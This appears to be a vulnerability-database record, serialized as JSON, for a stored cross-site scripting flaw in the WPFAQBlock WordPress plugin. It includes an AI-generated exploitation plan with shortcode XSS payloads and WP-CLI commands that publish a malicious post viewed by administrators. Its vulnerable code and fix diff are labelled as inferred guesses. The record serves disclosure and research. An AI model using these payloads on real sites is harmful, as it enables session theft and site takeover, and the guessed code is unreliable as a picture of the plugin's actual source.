[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGlHsX4vXMiIamScdOegt1wSQF112KH967Neffp1TBLU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-1093","wpfaqblock-faq-accordion-plugin-for-gutenberg-authenticated-contributor-stored-cross-site-scripting-via-class-shortcode-","WPFAQBlock– FAQ & Accordion Plugin For Gutenberg \u003C= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute","The WPFAQBlock– FAQ & Accordion Plugin For Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter of the 'wpfaqblock' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpfaqblock",null,"\u003C=1.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:19:54","2026-05-12 05:30:23",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3a3147b5-0362-4299-8339-655eaade948e?source=api-prod",[],"researched",false,3,"This research plan outlines the technical steps to exploit **CVE-2026-1093**, a Stored Cross-Site Scripting (XSS) vulnerability in the **WPFAQBlock** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **WPFAQBlock** plugin (versions \u003C= 1.1) fails to properly sanitize or escape the `class` attribute of its `[wpfaqblock]` shortcode. When the shortcode is processed, the user-supplied `class` value is concatenated into an HTML tag (likely a `div` or `section`) without being passed through `esc_attr()`. This allows a user with **Contributor** privileges or higher to inject arbitrary HTML and JavaScript into the rendered page.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[wpfaqblock]`\n*   **Vulnerable Attribute:** `class`\n*   **Authentication Required:** Contributor+ (standard WordPress permission to create\u002Fedit posts and use shortcodes).\n*   **Persistence:** Stored (the payload is saved in the `wp_posts` table and executes whenever the post is viewed).\n*   **Sink:** The value of the `class` attribute is reflected in the HTML source of the post on the frontend.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode during the `init` hook using `add_shortcode( 'wpfaqblock', 'render_callback_function' );`.\n2.  **Parsing:** The callback function uses `shortcode_atts()` to merge user-supplied attributes with defaults.\n    ```php\n    \u002F\u002F Predicted logic in callback:\n    $atts = shortcode_atts( array(\n        'class' => '',\n        \u002F\u002F ... other attributes\n    ), $atts );\n    ```\n3.  **Rendering (The Sink):** The plugin constructs the HTML output. It likely echoes or returns a string where the `class` attribute is placed inside double quotes.\n    ```php\n    \u002F\u002F Predicted vulnerable sink:\n    $output = '\u003Cdiv class=\"' . $atts['class'] . '\">'; \u002F\u002F No esc_attr() used here\n    ```\n4.  **Execution:** When a visitor (including an Administrator) views the post, the browser interprets the injected quote (`\"`) as the end of the class attribute, allowing the attacker to add new attributes (like `onmouseover`) or close the tag and start a `\u003Cscript>` block.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is triggered by **rendering** a shortcode. In WordPress, shortcodes are parsed automatically when a post is displayed.\n*   **Post Creation:** To inject the shortcode, we will use **WP-CLI**. This bypasses the need for frontend nonces associated with the Gutenberg editor or AJAX-based autosaves.\n*   **Frontend Execution:** No nonce is required to trigger the XSS. The payload executes when any user navigates to the public URL of the post.\n\n### 5. Exploitation Strategy\n1.  **Authentication:** Authenticate as a **Contributor** user.\n2.  **Injection:** Use WP-CLI to create a new post containing the malicious shortcode.\n3.  **Payload Selection:**\n    *   Primary Payload (Attribute Breakout): `[wpfaqblock class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n    *   Alternative Payload (Attribute Injection): `[wpfaqblock class='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;']`\n4.  **Triggering:** Navigate to the published post's URL using an **Administrator** session to demonstrate the impact (e.g., cookie theft or admin dashboard access).\n\n### 6. Test Data Setup\n*   **User:** Create a user with the `contributor` role.\n*   **Post:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    wp post create --post_type=post --post_status=publish --post_title=\"FAQ Page\" --post_author=$(wp user get attacker --field=ID) --post_content='[wpfaqblock class=\"\\\">\u003Cscript>confirm(\\\"XSS_EXPLOITED\\\")\u003C\u002Fscript>\"]'\n    ```\n\n### 7. Expected Results\n*   The HTML source of the rendered page should contain:\n    `\u003Cdiv class=\"\">\u003Cscript>confirm(\"XSS_EXPLOITED\")\u003C\u002Fscript>\">` (or similar depending on the exact tag name).\n*   The JavaScript `confirm()` dialog should trigger automatically upon page load.\n\n### 8. Verification Steps\n1.  **Retrieve Post URL:** Use `wp post list` to find the ID of the created post, then get the permalink.\n2.  **Navigate and Audit:** Use `browser_navigate` to visit the post.\n3.  **Inspect Source:** Use `browser_eval` to check for the existence of the injected script tag in the DOM.\n    ```javascript\n    \u002F\u002F Check if the script exists\n    document.body.innerHTML.includes('confirm(\"XSS_EXPLOITED\")')\n    ```\n4.  **Verify Admin Impact:** Log in as an administrator and visit the same URL to confirm the script executes in a high-privileged context.\n\n### 9. Alternative Approaches\nIf the plugin uses a specific Gutenberg block instead of a standard shortcode (common in modern \"Block\" plugins):\n*   **Gutenberg Attribute Injection:** The payload would be injected into the block's JSON attributes. We would still target the `class` or `className` attribute.\n*   **REST API Injection:** If the contributor uses the REST API to save the post, we would send a POST request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F[ID]` with the shortcode in the `content` field.\n\n**Payload Note:** If the plugin uses `esc_html()` but not `esc_attr()`, the breakout `\">` will still work because `esc_html()` only encodes `\u003C` and `>`, while `esc_attr()` is required to encode quotes. Since the injection point is an attribute (`class=\"...\"`), breaking out of the quotes is the primary goal.","The WPFAQBlock plugin for WordPress (versions \u003C= 1.1) is vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient output escaping on the 'class' attribute within the [wpfaqblock] shortcode. This allow authenticated users with Contributor-level permissions or higher to inject arbitrary JavaScript into pages that executes when viewed by other users, including administrators.","\u002F\u002F Inferred code within the shortcode registration callback\n\u002F\u002F File path likely: wp-content\u002Fplugins\u002Fwpfaqblock\u002Fwpfaqblock.php or similar\n\n$atts = shortcode_atts( array(\n    'class' => '',\n    'id'    => '',\n), $atts );\n\n$output = '\u003Cdiv class=\"' . $atts['class'] . '\">';","--- a\u002Fwpfaqblock.php\n+++ b\u002Fwpfaqblock.php\n@@ -10,7 +10,7 @@\n     $atts = shortcode_atts( array(\n         'class' => '',\n     ), $atts );\n \n-    $output = '\u003Cdiv class=\"' . $atts['class'] . '\">';\n+    $output = '\u003Cdiv class=\"' . esc_attr( $atts['class'] ) . '\">';","The exploit involves an attacker with at least Contributor privileges injecting a malicious script via the plugin's shortcode. 1. Authenticate as a Contributor. 2. Create or edit a post and insert the following shortcode: [wpfaqblock class='\\\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']. 3. The plugin fails to sanitize the 'class' attribute and reflects the raw input into the HTML 'class' property. 4. The payload uses a double quote to break out of the HTML attribute and inserts a \u003Cscript> tag. 5. When any user (such as an Administrator) views the published post, the JavaScript payload executes in their browser context.","gemini-3-flash-preview","2026-04-18 00:38:51","2026-04-18 00:39:06",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfaqblock\u002Ftags"]